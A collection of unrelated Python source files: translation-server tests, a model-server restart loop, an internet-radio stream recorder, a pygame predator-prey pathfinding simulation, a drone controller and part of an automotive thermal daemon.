return self.iterator_fn()
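# Illustrative-only sketch (not part of the original module): pairing the
# iterator factory above with EmulatedIterable so a side input built from
# `sources` (assumed to be a list of iobase.BoundedSource objects) can be
# re-iterated, with each iteration backed by prefetching reader threads.
def _example_emulated_side_input(sources):
  return EmulatedIterable(
      get_iterator_fn_for_sources(sources, max_reader_threads=4))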
|
test_translation.py
|
import unittest
import threading
import model_server as ms
import available_models
import time
import requests
import os
dir_path = os.path.dirname(os.path.realpath(__file__))
os.chdir(dir_path[:-5])
class TestTranslation(unittest.TestCase):
"""Starting the translation server here"""
model_server_thread = threading.Thread(target=ms.start_model_server)
print("Starting model server")
model_server_thread.start()
# Wait 3 seconds to start model server
time.sleep(3)
def setUp(self):
"""Set up function for tests. This function is run before every test"""
self.model_server_url = available_models.get_conf()["translate_url"]
self.model_ids = available_models.get_valid_model_ids()
self.translation_text = "Hi I am a test string. How are you today?"
def test_translation_output_type(self):
"""Test if the output of a translation from the translate_text is an TranslatedObject. So this did it return something. And try to translate every id that is
registered in the config file. This is an integration test because we get all the ids from another function."""
print("This is an integration test. Testing getting valid model ids and trying to translate with each id found.")
for model_id in self.model_ids:
translation = ms.translate_text(self.translation_text, self.model_server_url, model_id)
self.assertIsInstance(translation, ms.TranslatedObject, "Function does not return translation object")
def test_translation_output_types(self):
"""Test if the attributes of the TranslatedObject object that is returned by translate_text() are of the right types"""
translation = ms.translate_text(self.translation_text, self.model_server_url, 100)
self.assertIsInstance(translation.tgt, str, "Translation object does not have tgt that is a string")
self.assertIsInstance(translation.src, str, "Translation object does not have src that is a string")
        self.assertIsInstance(translation.score, float, "Translation object does not have a score that is a float")
def test_non_existing_id(self):
"""Test if the right exception is raised when trying to select a model id in the translate server that is registered not in the config file"""
non_existing_id = 1
while non_existing_id in self.model_ids:
non_existing_id += 1
self.assertRaises(ms.ModelIDNotFoundException, ms.translate_text, text=self.translation_text, url=self.model_server_url, model_id=non_existing_id)
def test_non_valid_url(self):
"""Test to see if the right exception is raised when trying to translate with a url that not the url that points to the translate server """
for model_id in self.model_ids:
self.assertRaises(requests.exceptions.ConnectionError, ms.translate_text, text=self.translation_text, url="https://0.0.0.0", model_id=model_id)
def test_translation_string_length(self):
"""Test if the output of translate_text is longer then 0 and 1 wehn 'Hi I am a test string. How are you today?' is translated"""
self.assertGreater(len(ms.translate_text(self.translation_text, self.model_server_url, 100).tgt), 0, "Return of translation has 0 characters")
self.assertGreater(len(ms.translate_text(self.translation_text, self.model_server_url, 100).tgt), 1,
f"Return of translation of '{self.translation_text}' has only 1 character")
def test_translation_from_audio_file(self):
"""Test if the audio and translation work together"""
print("This is a integration test testing if the audio to text and translation work together")
for model_id in self.model_ids:
text = ms.transcribe_audio("harvard.wav")
translate_object = ms.translate_text(text, self.model_server_url, model_id)
            self.assertIsInstance(translate_object, ms.TranslatedObject, "Function does not return a translation object")
if __name__ == '__main__':
unittest.main()
TestTranslation.model_server_thread.join()
|
control.py
|
import os
from time import sleep
import json
from multiprocessing import Process
states_json_path = "/workspace/go_proj/src/Ai_WebServer/algorithm_utils/model_states.json"
model_name = "firstOrder"
def run_model_server():
os.system("python run.py")
if __name__ == '__main__':
running = False
while True:
        with open(states_json_path, "r", encoding="utf-8") as f:
states = json.load(f)
if states[model_name] and not running:
os.system("ps -ef|grep python|grep -v control|cut -c 9-16|xargs kill -9")
p = Process(target=run_model_server,args=())
p.start()
running = True
elif not states[model_name]:
running = False
sleep(1)
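# Illustrative note (format inferred from the loop above, not a documented
# schema): model_states.json is expected to map model names to booleans,
# e.g. {"firstOrder": true}. A true value kills other python processes and
# (re)starts run.py in a child process; a false value only clears the local
# `running` flag so a later true value can restart it.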
|
AgRec.py
|
#-*- coding: utf-8 -*-
import re
import os
import sys
import requests
import random
import m3u8
import datetime
import argparse
import subprocess
from pathlib import Path
from time import sleep
from datetime import datetime as dt
from datetime import timedelta
from threading import (Event, Thread)
parser = argparse.ArgumentParser(description='AgRec')
parser.add_argument('-t', '--time', help='Recording time (seconds)', type=int)
parser.add_argument('-o', '--output', help='Output file name')
parser.add_argument('-m', '--mode', help='Recording mode [1-3] (1: rtmp, 2: hls, 3: both)', type=int, default=1)
parser.add_argument('-mu', '--multi', help='Number of simultaneous recordings (at most one connection per server)', type=int, default=1)
args = parser.parse_args()
def ngchr(str):
dic={'\¥': '¥', '/': '/', ':': ':', '*': '*', '?': '?', '!': '!', '¥"': '”', '<': '<', '>': '>','|': '|'}
table='\\/:*?!"<>|'
for ch in table:
if ch in str:
rm = dic.pop(ch)
str = str.replace(ch,rm)
return str
# Server availability check
def svchk(num):
th = num
rq = requests.get(listurl)
if rq.status_code != 200:
rtmplist = None
else:
src = str(rq.content).replace(r'\n',"")
src = src.replace(r'\r',"")
src = src.replace(r'\t',"")
serverlist = re.findall(r'<serverinfo>(.+?)<\/serverinfo>',src)
serverlist = [s for s in serverlist if not '<cryptography>true</cryptography>' in s]
rtmplist = []
errurl = []
for server in serverlist:
s = re.findall(r'<server>.+?(rtmp.+?)<\/server>', server)
app = re.findall(r'<app>(.+?)<\/app>', server)
stream = re.findall(r'<stream>(.+?)<\/stream>', server)
url = '{}/{}/{}'.format(s[0],app[0],stream[0])
rtmplist.append(url)
for num in range(1,len(rtmplist)+1):
chk = dir / 'chk@{0}.flv'.format(num)
cmd = str(dumppath) + ' -r ' + rtmplist[num-1] + ' --live -B 1 -o ' +str(chk)
exec('serverchk%d = subprocess.Popen(cmd,shell=True)' % (num-1))
for num in range(1,len(rtmplist)+1):
exec('serverchk%d.communicate()' % (num-1))
            chk_ = dir / 'chk@{0}.flv'.format(num)
            # drop servers whose test download produced an empty file
            if chk_.stat().st_size == 0:
                errurl.append(rtmplist[num-1])
            chk_.unlink()
for url in errurl:
rtmplist.remove(url)
if th:
if th > len(rtmplist):
th = len(rtmplist)
else:
th = 1
rtmplist = random.sample(rtmplist,th)
return rtmplist
def m3u8get(v_m3u8):
v_pl = m3u8.load(v_m3u8)
urls = []
bands = []
for n in range(len(v_pl.playlists)):
pl = v_pl.playlists[n]
urls.append(pl.uri)
bands.append(pl.stream_info.bandwidth)
pl = urls[bands.index(max(bands))]
return pl
def play(_pl):
if high:
pl = m3u8get(high)
else:
pl = _pl
print(pl)
cmd = ('"{0}" "{1}"').format(str(ffplaypath),pl)
subprocess.run(cmd,shell=True)
# RTMP recording
def rtmp(_t,_file,_url):
flvs = []
r_recs = []
for num in range(len(_url)):
if len(_url) != 1:
flvs.append(_file.parent / Path(_file.stem + '@' + str(num+1) + '.flv'))
else:
flvs.append(_file.with_suffix('.flv'))
r_cmd = ('"{0}" -r "{1}" --live -B {2} -o "{3}"').format(str(dumppath),_url[num],_t,str(flvs[num]))
r_recs.append(subprocess.Popen(r_cmd,shell=True))
for num in range(len(_url)):
r_recs[num].communicate()
if _file.suffix != '.flv':
for num in range(len(_url)):
out =str(flvs[num].with_suffix(_file.suffix))
c_cmd = ('"{0}" -i "{1}" -y -c copy "{2}"').format(str(ffmpegpath),str(flvs[num]),out)
conv = subprocess.run(c_cmd,shell=True)
Path(flvs[num]).unlink()
# HLS recording
def hls(_t,_file,_m3u8):
    sleep(30)  # compensate for HLS stream lag
td = datetime.timedelta(seconds=_t)
h_out = str(_file.parent / Path(_file.stem + '(hls)' + _file.suffix))
h_cmd = ('"{0}" -ss 0 -i "{1}" -t {2} -y -c copy "{3}"').format(str(ffmpegpath),_m3u8,td,h_out)
subprocess.Popen(h_cmd,shell=True)
dir = Path.cwd()
dumppath = dir / 'exe' / 'rtmpdump.exe'
ffmpegpath = dir / 'exe' / 'ffmpeg.exe'
ffplaypath = dir / 'exe' / 'ffplay.exe'
listurl='http://www.uniqueradio.jp/agplayerf/getfmsListHD.php'
# Edit here to support the high-quality stream
high = None
pl = 'http://ic-www.uniqueradio.jp/iphone/3G.m3u8'
fname = args.output
t = args.time
m = args.mode
mu = args.multi
code = 0
if not fname:
code = 1
if not t:
code += 1
if code > 1:
play(pl)
sys.exit()
if code == 1:
sys.exit()
now = dt.now()
DATE = now.strftime('%Y%m%d%H%M')
DATE8 = DATE[:-4]
fname = Path(ngchr(fname) + '_[%s]' % DATE8)
rtmpurl = None
if fname.suffix == '':
fname = Path(str(fname) + '.mp4')
fname = dir / fname
if m != 2:
rtmpurl = svchk(mu)
if not rtmpurl or len(rtmpurl) == 0:
m = 2
if m != 1:
if high:
pl = m3u8get(high)
if pl:
hls= Thread(target=hls,args=(t,fname,pl))
if rtmpurl:
rtmp= Thread(target=rtmp,args=(t,fname,rtmpurl))
if m == 2:
hls.start()
hls.join()
elif m ==3:
hls.start()
rtmp.start()
hls.join()
rtmp.join()
else:
rtmp.start()
rtmp.join()
sys.exit()
|
main.py
|
import pygame
import threading
import time
from bot import *
from maps import *
from find_path import *
from picToMap import *
pygame.init()
# set map size
map_size = (50, 50)
# create paint screen
screen = pygame.display.set_mode((map_size[0] * 10, map_size[1] * 10))
# set window title
pygame.display.set_caption("AI_playground")
# create thread clocks and continue flags
game_clock = pygame.time.Clock()
game_continue = True
physics_clock = pygame.time.Clock()
AI_continue = True
AI_PAUSED = False
graphics_clock = pygame.time.Clock()
graphics_continue = True
# preset color set
ORANGE = (255, 125, 30)
BLUE = (50, 150, 255)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLACK = (0, 0, 0)
GREY = (200, 200, 200)
# initialize predator positions
predator1 = bot(center_position=[40, 30])
predator2 = bot(center_position=[16, 9])
predator3 = bot(center_position=[30, 10])
# organize predators into a predator list
predatorList = [predator1, predator2, predator3]
# initialize prey position
prey = bot(center_position=[49, 49], move_duration=5, field_of_view=math.pi / 2, range_of_view=15)
# the size of each grid is 10x10 -> map coordinate = pixel coordinate / 10
m = GridWithWeights(map_size[0], map_size[1])
# produce map from grey scale picture, contains walls
mapArray = generateMap("map50_02.bmp", map_size[0], map_size[1])
m.walls = []
for x in range(len(mapArray)):
for y in range(len(mapArray[x])):
if mapArray[x][y] < 255:
# map direction correction
m.walls.append((x, y))
def draw_view_field(bot, color=(0, 0, 0)):
# calculate the left top corner coordinate for the range of view arc
arc_posx = bot.get_pos()[0] * 10 - bot.range_of_view * 10
arc_posy = bot.get_pos()[1] * 10 - bot.range_of_view * 10
# draw arc of view field
pygame.draw.arc(screen,
color,
(arc_posx, arc_posy, bot.range_of_view * 20, bot.range_of_view * 20),
-bot.direction_of_view - bot.field_of_view / 2,
-bot.direction_of_view + bot.field_of_view / 2, 1)
# draw left line of view field
pygame.draw.line(screen,
color,
(bot.get_pos()[0] * 10 + 5, bot.get_pos()[1] * 10 + 5),
(bot.get_pos()[0] * 10 + bot.range_of_view * 10 * math.cos(
bot.direction_of_view + bot.field_of_view / 2),
bot.get_pos()[1] * 10 + bot.range_of_view * 10 * math.sin(
bot.direction_of_view + bot.field_of_view / 2)),
1)
# draw right line of view field
pygame.draw.line(screen,
color,
(bot.get_pos()[0] * 10 + 5, bot.get_pos()[1] * 10 + 5),
(bot.get_pos()[0] * 10 + bot.range_of_view * 10 * math.cos(
bot.direction_of_view - bot.field_of_view / 2),
bot.get_pos()[1] * 10 + bot.range_of_view * 10 * math.sin(
bot.direction_of_view - bot.field_of_view / 2)),
1)
def draw_planned_path(bot, color=(0, 0, 0)):
for (row, col) in bot.pathToTarget:
pygame.draw.rect(screen, color, (row * 10, col * 10, 8, 8))
def graphics_thread():
global prey, m, predatorList
while graphics_continue:
pygame.draw.rect(screen, BLACK, (0, 0, 500, 500))
for row in range(m.height):
for col in range(m.width):
if m.passable((row, col)):
# ground color
c = BLACK
else:
# wall color
c = GREY
# draw map block
pygame.draw.rect(screen, c, (row * 10, col * 10, 8, 8))
# prey
# draw range of view for prey
draw_view_field(prey, GREEN)
# draw planned path
draw_planned_path(prey, BLUE)
# predator
for predator in predatorList:
# draw range of view for each predator
draw_view_field(predator, RED)
# draw planned path
draw_planned_path(predator, ORANGE)
# prey
pygame.draw.rect(screen, GREEN, (prey.get_pos()[0] * 10, prey.get_pos()[1] * 10, 8, 8))
        # draw the predators themselves (to prevent the blue path blocks from covering the predators)
for predator in predatorList:
pygame.draw.rect(screen, RED, (predator.get_pos()[0] * 10, predator.get_pos()[1] * 10, 8, 8))
pygame.display.flip()
graphics_clock.tick(60)
def set_auto_cruise_target(bot, range):
while True:
bot_x = bot.get_pos()[0] + random.randint(-range, range)
bot_y = bot.get_pos()[1] + random.randint(-range, range)
if m.passable((bot_x, bot_y)) and m.in_bounds((bot_x, bot_y)):
break
bot.set_target_pos(bot_x, bot_y)
bot.pathToTarget = a_star_search(m, (bot.get_pos()[0], bot.get_pos()[1]), bot.get_target_pos())
def is_line_blocked_by_wall(x_start=0, y_start=0, x_end=0, y_end=0,):
x, y = 0, 0
diff_x = x_end - x_start
diff_y = y_end - y_start
if diff_x == 0:
for y in range(y_start, y_end):
if not m.passable((x_start, y)):
return True
return False
elif diff_y == 0:
for x in range(x_start, x_end):
if not m.passable((x, y_start)):
return True
return False
def AI_thread():
global predatorList, prey, path, m, AI_PAUSED
while AI_continue:
# pause the simulation
if pygame.key.get_pressed()[pygame.K_SPACE]:
AI_PAUSED = not AI_PAUSED
time.sleep(0.5)
if AI_PAUSED:
continue
# prey AI
# calculate if the prey is in the field range of the predator
# find the closest predator
min_dist = 10000000
escape_vector = [0, 0]
for predator in predatorList:
if (predator.get_pos()[0] - prey.get_pos()[0]) ** 2 + (predator.get_pos()[1] - prey.get_pos()[1]) ** 2 < prey.range_of_view ** 2:
prey_dx = prey.get_pos()[0] - predator.get_pos()[0]
prey_dy = prey.get_pos()[1] - predator.get_pos()[1]
d = prey_dx ** 2 + prey_dy ** 2
if d < min_dist:
                    min_dist = d  # track the distance to the closest predator seen so far
if prey.get_pos()[0] - predator.get_pos()[0] > 0:
escape_vector[0] = 1
elif prey.get_pos()[0] - predator.get_pos()[0] < 0:
escape_vector[0] = -1
if prey.get_pos()[1] - predator.get_pos()[1] > 0:
escape_vector[1] = 1
elif prey.get_pos()[1] - predator.get_pos()[1] < 0:
escape_vector[1] = -1
# print(escape_vector)
if m.passable(escape_vector) and m.in_bounds(escape_vector):
prey.set_target_pos(prey.get_pos()[0] + escape_vector[0], prey.get_pos()[1] + escape_vector[1])
prey.pathToTarget = a_star_search(m, (prey.get_pos()[0], prey.get_pos()[1]), prey.get_target_pos())
if len(prey.pathToTarget) > 1 and prey.timer > prey.get_move_duration():
# set direction to prey
if len(prey.pathToTarget) > 4:
lookingAt = 3
else:
lookingAt = len(prey.pathToTarget) - 1
dx = prey.pathToTarget[lookingAt][0] - prey.get_pos()[0]
dy = prey.pathToTarget[lookingAt][1] - prey.get_pos()[1]
d = math.sqrt(dx ** 2 + dy ** 2)
if d != 0:
if dy > 0:
prey.direction_of_view = math.acos(dx / d)
else:
prey.direction_of_view = math.pi * 2 - math.acos(dx / d)
# move to the next node on path
prey.move_to_next()
# reset timer
prey.timer = 0
elif len(prey.pathToTarget) <= 1:
            # plan a new route if no further nodes are left
# a star search
set_auto_cruise_target(prey, prey.range_of_view)
prey.pathToTarget = a_star_search(m, (prey.get_pos()[0], prey.get_pos()[1]), prey.get_target_pos())
else:
# wait for timer to reach move duration limit
prey.timer += 1
# mouse override prey pos
if pygame.key.get_pressed()[pygame.K_a]:
mpx, mpy = pygame.mouse.get_pos()
# translate screen pixel mouse pos to world pos
mouse_pos_x = mpx // 10
mouse_pos_y = mpy // 10
if (mouse_pos_x, mouse_pos_y) in m.walls:
pass
else:
prey.set_pos((mouse_pos_x, mouse_pos_y))
prey.pathToTarget = a_star_search(m, (prey.get_pos()[0], prey.get_pos()[1]), prey.get_target_pos())
# for each predator
for predator in predatorList:
# print(is_line_blocked_by_wall(predator.get_pos()[0], predator.get_pos()[1], prey.get_pos()[0], prey.get_pos()[1]))
# calculate if the prey is in the field range of the predator
if (predator.get_pos()[0] - prey.get_pos()[0])**2 + (predator.get_pos()[1] - prey.get_pos()[1])**2 < predator.range_of_view ** 2:
prey_dx = prey.get_pos()[0] - predator.get_pos()[0]
prey_dy = prey.get_pos()[1] - predator.get_pos()[1]
d = math.sqrt(prey_dx ** 2 + prey_dy ** 2)
if d != 0:
# initialize temp local var angle
angle = 0
if prey_dy > 0:
angle = math.acos(prey_dx / d)
else:
angle = math.pi * 2 - math.acos(prey_dx / d)
# check if the angular position of the prey is in range
if predator.direction_of_view + predator.field_of_view / 2 > angle > predator.direction_of_view - predator.field_of_view / 2:
predator.set_target_pos(prey.get_pos()[0], prey.get_pos()[1])
# recalculate route
predator.pathToTarget = a_star_search(m, (predator.get_pos()[0], predator.get_pos()[1]), predator.get_target_pos())
else:
# if the prey is in range but out of view field angle, enter auto cruise mode
# if the predator reaches prey last sighted spot and found nothing
if predator.get_pos()[0] == predator.get_target_pos()[0] and predator.get_pos()[1] == predator.get_target_pos()[1]:
                            # randomly generate a new cruise target until it is neither in a wall nor out of the map
set_auto_cruise_target(predator, predator.range_of_view // 1)
else:
# if the predator reaches prey last sighted spot and found nothing
if predator.get_pos()[0] == predator.get_target_pos()[0] and predator.get_pos()[1] == predator.get_target_pos()[1]:
                    # randomly generate a new cruise target until it is neither in a wall nor out of the map
set_auto_cruise_target(predator, predator.range_of_view // 1)
''' find path to prey
without the range of view (max search depth parameter)
the find path algorithm will use 100 as default
'''
# if didn't reach prey and allow to move
if len(predator.pathToTarget) > 1 and predator.timer > predator.get_move_duration():
# set direction to prey
if len(predator.pathToTarget) > 4:
lookingAt = 3
else:
lookingAt = len(predator.pathToTarget) - 1
dx = predator.pathToTarget[lookingAt][0] - predator.get_pos()[0]
dy = predator.pathToTarget[lookingAt][1] - predator.get_pos()[1]
d = math.sqrt(dx**2 + dy**2)
if d != 0:
if dy > 0:
predator.direction_of_view = math.acos(dx / d)
else:
predator.direction_of_view = math.pi * 2 - math.acos(dx / d)
predator.move_to_next()
# reset timer
predator.timer = 0
elif len(predator.pathToTarget) <= 1:
                # plan a new route if no further nodes are left
# a star search
predator.pathToTarget = a_star_search(m, (predator.get_pos()[0], predator.get_pos()[1]), predator.get_target_pos())
else:
# wait for timer to reach move duration limit
predator.timer += 1
if predator.get_pos() == prey.get_pos():
print("catches!")
physics_clock.tick(60)
# physics thread predator1
pTarget = threading.Thread(target=AI_thread)
pTarget.start()
# graphics thread predator1
gTarget = threading.Thread(target=graphics_thread)
gTarget.start()
while game_continue:
# basic event control
for event in pygame.event.get():
# window exit
if event.type == pygame.QUIT:
# exit all threads
graphics_continue = False
AI_continue = False
game_continue = False
break
# if event.type == pygame.KEYDOWN:
# if
game_clock.tick(60)
# quit window
exit()
|
drone_controller.py
|
import json
from drones.CrazyFlie import CrazyFlie
from drones.ProxyDrone import ProxyDrone
from drones.drone import serial_connection, Drone, control_drone, WayPoint
import threading
# TODO: this is just a temporary solution
import serial
class DroneController:
def __init__(self, vinter_receiver):
self.drones = dict()
with open('drones.json') as json_file:
data = json.load(json_file)
drones = data["drones"]
for d in drones:
active = d["active"]
if active:
drone_name = d["name"]
drone_type = d["type"]
pid_yaw_p = float(d["pid_yaw_p"])
pid_yaw_i = float(d["pid_yaw_i"])
pid_yaw_d = float(d["pid_yaw_d"])
pid_pitch_p = float(d["pid_pitch_p"])
pid_pitch_i = float(d["pid_pitch_i"])
pid_pitch_d = float(d["pid_pitch_d"])
pid_roll_p = float(d["pid_roll_p"])
pid_roll_i = float(d["pid_roll_i"])
pid_roll_d = float(d["pid_roll_d"])
pid_throttle_p = float(d["pid_throttle_p"])
pid_throttle_i = float(d["pid_throttle_i"])
pid_throttle_d = float(d["pid_throttle_d"])
if drone_type == "ProxyDrone":
drone = ProxyDrone(drone_name, drone_type)
if drone_type == "CrazyFlie":
drone = CrazyFlie(drone_name, drone_type)
drone.active = d["active"]
drone.configure_pid(
pid_yaw_p=pid_yaw_p,
pid_yaw_i=pid_yaw_i,
pid_yaw_d=pid_yaw_d,
pid_pitch_p=pid_pitch_p,
pid_pitch_i=pid_pitch_i,
pid_pitch_d=pid_pitch_d,
pid_roll_p=pid_roll_p,
pid_roll_i=pid_roll_i,
pid_roll_d=pid_roll_d,
pid_throttle_p=pid_throttle_p,
pid_throttle_i=pid_throttle_i,
pid_throttle_d=pid_throttle_d
)
drone.safety_radius = d["safety_radius"]
drone.path = d["path"]
with open("flight_paths/" + drone.path) as json_file:
path = json.load(json_file)
for wp in path:
label = wp["label"]
x = wp["x"]
y = wp["y"]
z = wp["z"]
checkpoint_radius = wp["checkpoint_radius"]
_wp = WayPoint(label, type, x, y, z, checkpoint_radius)
try:
resting_time = wp["resting_time"]
_wp.resting_time = resting_time
except KeyError:
pass
if label == "end":
_wp.disarm_height = wp["disarm_height"]
drone.way_points.append(_wp)
drone.info()
self.drones[drone.drone_name] = drone
print("Added drone:", drone.drone_name)
self.vinter_receiver = vinter_receiver
def start_control_loop(self): # , app):
for d in self.drones.values():
if d.active:
# d.app = app
print("starting control loop for:", d.drone_name)
thread = threading.Thread(target=control_drone, args=(d, self.vinter_receiver))
thread.start()
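# Illustrative note (fields inferred from the constructor above; not a shipped
# schema): a minimal drones.json entry looks roughly like
#
#   {"drones": [{"name": "drone1", "type": "CrazyFlie", "active": true,
#                "pid_yaw_p": "1.0", "pid_yaw_i": "0.0", "pid_yaw_d": "0.0",
#                "pid_pitch_p": "1.0", "pid_pitch_i": "0.0", "pid_pitch_d": "0.0",
#                "pid_roll_p": "1.0", "pid_roll_i": "0.0", "pid_roll_d": "0.0",
#                "pid_throttle_p": "1.0", "pid_throttle_i": "0.0", "pid_throttle_d": "0.0",
#                "safety_radius": 0.5, "path": "example_path.json"}]}
#
# and each waypoint in flight_paths/<path> needs "label", "x", "y", "z" and
# "checkpoint_radius", with an optional "resting_time" and, for the waypoint
# labelled "end", a "disarm_height".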
|
thermald.py
|
#!/usr/bin/env python3
import datetime
import os
import queue
import threading
import time
from collections import OrderedDict, namedtuple
from pathlib import Path
from typing import Dict, Optional, Tuple
import psutil
import cereal.messaging as messaging
from cereal import log
from common.dict_helpers import strip_deprecated_keys
from common.filter_simple import FirstOrderFilter
from common.params import Params
from common.realtime import DT_TRML, sec_since_boot
from selfdrive.controls.lib.alertmanager import set_offroad_alert
from system.hardware import HARDWARE, TICI, AGNOS
from selfdrive.loggerd.config import get_available_percent
from selfdrive.statsd import statlog
from system.swaglog import cloudlog
from selfdrive.thermald.power_monitoring import PowerMonitoring
from selfdrive.thermald.fan_controller import TiciFanController
from system.version import terms_version, training_version
ThermalStatus = log.DeviceState.ThermalStatus
NetworkType = log.DeviceState.NetworkType
NetworkStrength = log.DeviceState.NetworkStrength
CURRENT_TAU = 15. # 15s time constant
TEMP_TAU = 5. # 5s time constant
DISCONNECT_TIMEOUT = 5. # wait 5 seconds before going offroad after disconnect so you get an alert
PANDA_STATES_TIMEOUT = int(1000 * 1.5 * DT_TRML) # 1.5x the expected pandaState frequency
ThermalBand = namedtuple("ThermalBand", ['min_temp', 'max_temp'])
HardwareState = namedtuple("HardwareState", ['network_type', 'network_metered', 'network_strength', 'network_info', 'nvme_temps', 'modem_temps'])
# List of thermal bands. We will stay within this region as long as we are within the bounds.
# When exiting the bounds, we'll jump to the lower or higher band. Bands are ordered in the dict.
THERMAL_BANDS = OrderedDict({
ThermalStatus.green: ThermalBand(None, 80.0),
ThermalStatus.yellow: ThermalBand(75.0, 96.0),
ThermalStatus.red: ThermalBand(80.0, 107.),
ThermalStatus.danger: ThermalBand(94.0, None),
})
# Override to highest thermal band when offroad and above this temp
OFFROAD_DANGER_TEMP = 79.5
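# Minimal sketch (an assumption, not this module's own update code) of how the
# banded hysteresis described above can be applied: stay in the current band
# until the temperature leaves its bounds, then step to the neighbouring band.
def _next_thermal_band(current_status, comp_temp):
  band = THERMAL_BANDS[current_status]
  statuses = list(THERMAL_BANDS.keys())
  idx = statuses.index(current_status)
  if band.min_temp is not None and comp_temp < band.min_temp:
    return statuses[idx - 1]
  if band.max_temp is not None and comp_temp > band.max_temp:
    return statuses[idx + 1]
  return current_status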
prev_offroad_states: Dict[str, Tuple[bool, Optional[str]]] = {}
tz_by_type: Optional[Dict[str, int]] = None
def populate_tz_by_type():
global tz_by_type
tz_by_type = {}
for n in os.listdir("/sys/devices/virtual/thermal"):
if not n.startswith("thermal_zone"):
continue
with open(os.path.join("/sys/devices/virtual/thermal", n, "type")) as f:
tz_by_type[f.read().strip()] = int(n.lstrip("thermal_zone"))
def read_tz(x):
if x is None:
return 0
if isinstance(x, str):
if tz_by_type is None:
populate_tz_by_type()
x = tz_by_type[x]
try:
with open(f"/sys/devices/virtual/thermal/thermal_zone{x}/temp") as f:
return int(f.read())
except FileNotFoundError:
return 0
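# Build a deviceState message with CPU/GPU/memory/ambient/PMIC temperatures scaled per the hardware's thermal config.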
def read_thermal(thermal_config):
dat = messaging.new_message('deviceState')
dat.deviceState.cpuTempC = [read_tz(z) / thermal_config.cpu[1] for z in thermal_config.cpu[0]]
dat.deviceState.gpuTempC = [read_tz(z) / thermal_config.gpu[1] for z in thermal_config.gpu[0]]
dat.deviceState.memoryTempC = read_tz(thermal_config.mem[0]) / thermal_config.mem[1]
dat.deviceState.ambientTempC = read_tz(thermal_config.ambient[0]) / thermal_config.ambient[1]
dat.deviceState.pmicTempC = [read_tz(z) / thermal_config.pmic[1] for z in thermal_config.pmic[0]]
return dat
def set_offroad_alert_if_changed(offroad_alert: str, show_alert: bool, extra_text: Optional[str]=None):
if prev_offroad_states.get(offroad_alert, None) == (show_alert, extra_text):
return
prev_offroad_states[offroad_alert] = (show_alert, extra_text)
set_offroad_alert(offroad_alert, show_alert, extra_text)
def hw_state_thread(end_event, hw_queue):
"""Handles non critical hardware state, and sends over queue"""
count = 0
registered_count = 0
prev_hw_state = None
modem_version = None
modem_nv = None
modem_configured = False
while not end_event.is_set():
# these are expensive calls. update every 10s
if (count % int(10. / DT_TRML)) == 0:
try:
network_type = HARDWARE.get_network_type()
modem_temps = HARDWARE.get_modem_temperatures()
if len(modem_temps) == 0 and prev_hw_state is not None:
modem_temps = prev_hw_state.modem_temps
# Log modem version once
if AGNOS and ((modem_version is None) or (modem_nv is None)):
modem_version = HARDWARE.get_modem_version() # pylint: disable=assignment-from-none
modem_nv = HARDWARE.get_modem_nv() # pylint: disable=assignment-from-none
if (modem_version is not None) and (modem_nv is not None):
cloudlog.event("modem version", version=modem_version, nv=modem_nv)
hw_state = HardwareState(
network_type=network_type,
network_metered=HARDWARE.get_network_metered(network_type),
network_strength=HARDWARE.get_network_strength(network_type),
network_info=HARDWARE.get_network_info(),
nvme_temps=HARDWARE.get_nvme_temperatures(),
modem_temps=modem_temps,
)
try:
hw_queue.put_nowait(hw_state)
except queue.Full:
pass
if AGNOS and (hw_state.network_info is not None) and (hw_state.network_info.get('state', None) == "REGISTERED"):
registered_count += 1
else:
registered_count = 0
if registered_count > 10:
cloudlog.warning(f"Modem stuck in registered state {hw_state.network_info}. nmcli conn up lte")
os.system("nmcli conn up lte")
registered_count = 0
# TODO: remove this once the config is in AGNOS
if not modem_configured and len(HARDWARE.get_sim_info().get('sim_id', '')) > 0:
cloudlog.warning("configuring modem")
HARDWARE.configure_modem()
modem_configured = True
prev_hw_state = hw_state
except Exception:
cloudlog.exception("Error getting hardware state")
count += 1
time.sleep(DT_TRML)
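# Main loop: filter temperatures, track the thermal band, decide the onroad/offroad transition and publish deviceState.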
def thermald_thread(end_event, hw_queue):
pm = messaging.PubMaster(['deviceState'])
sm = messaging.SubMaster(["peripheralState", "gpsLocationExternal", "controlsState", "pandaStates"], poll=["pandaStates"])
count = 0
onroad_conditions: Dict[str, bool] = {
"ignition": False,
}
startup_conditions: Dict[str, bool] = {}
startup_conditions_prev: Dict[str, bool] = {}
off_ts = None
started_ts = None
started_seen = False
thermal_status = ThermalStatus.green
last_hw_state = HardwareState(
network_type=NetworkType.none,
network_metered=False,
network_strength=NetworkStrength.unknown,
network_info=None,
nvme_temps=[],
modem_temps=[],
)
current_filter = FirstOrderFilter(0., CURRENT_TAU, DT_TRML)
temp_filter = FirstOrderFilter(0., TEMP_TAU, DT_TRML)
should_start_prev = False
in_car = False
engaged_prev = False
params = Params()
power_monitor = PowerMonitoring()
HARDWARE.initialize_hardware()
thermal_config = HARDWARE.get_thermal_config()
fan_controller = None
while not end_event.is_set():
sm.update(PANDA_STATES_TIMEOUT)
pandaStates = sm['pandaStates']
peripheralState = sm['peripheralState']
msg = read_thermal(thermal_config)
if sm.updated['pandaStates'] and len(pandaStates) > 0:
# Set ignition based on any panda connected
onroad_conditions["ignition"] = any(ps.ignitionLine or ps.ignitionCan for ps in pandaStates if ps.pandaType != log.PandaState.PandaType.unknown)
pandaState = pandaStates[0]
in_car = pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected
# Setup fan handler on first connect to panda
if fan_controller is None and peripheralState.pandaType != log.PandaState.PandaType.unknown:
if TICI:
fan_controller = TiciFanController()
elif (sec_since_boot() - sm.rcv_time['pandaStates']/1e9) > DISCONNECT_TIMEOUT:
if onroad_conditions["ignition"]:
onroad_conditions["ignition"] = False
cloudlog.error("panda timed out onroad")
try:
last_hw_state = hw_queue.get_nowait()
except queue.Empty:
pass
msg.deviceState.freeSpacePercent = get_available_percent(default=100.0)
msg.deviceState.memoryUsagePercent = int(round(psutil.virtual_memory().percent))
msg.deviceState.cpuUsagePercent = [int(round(n)) for n in psutil.cpu_percent(percpu=True)]
msg.deviceState.gpuUsagePercent = int(round(HARDWARE.get_gpu_usage_percent()))
msg.deviceState.networkType = last_hw_state.network_type
msg.deviceState.networkMetered = last_hw_state.network_metered
msg.deviceState.networkStrength = last_hw_state.network_strength
if last_hw_state.network_info is not None:
msg.deviceState.networkInfo = last_hw_state.network_info
msg.deviceState.nvmeTempC = last_hw_state.nvme_temps
msg.deviceState.modemTempC = last_hw_state.modem_temps
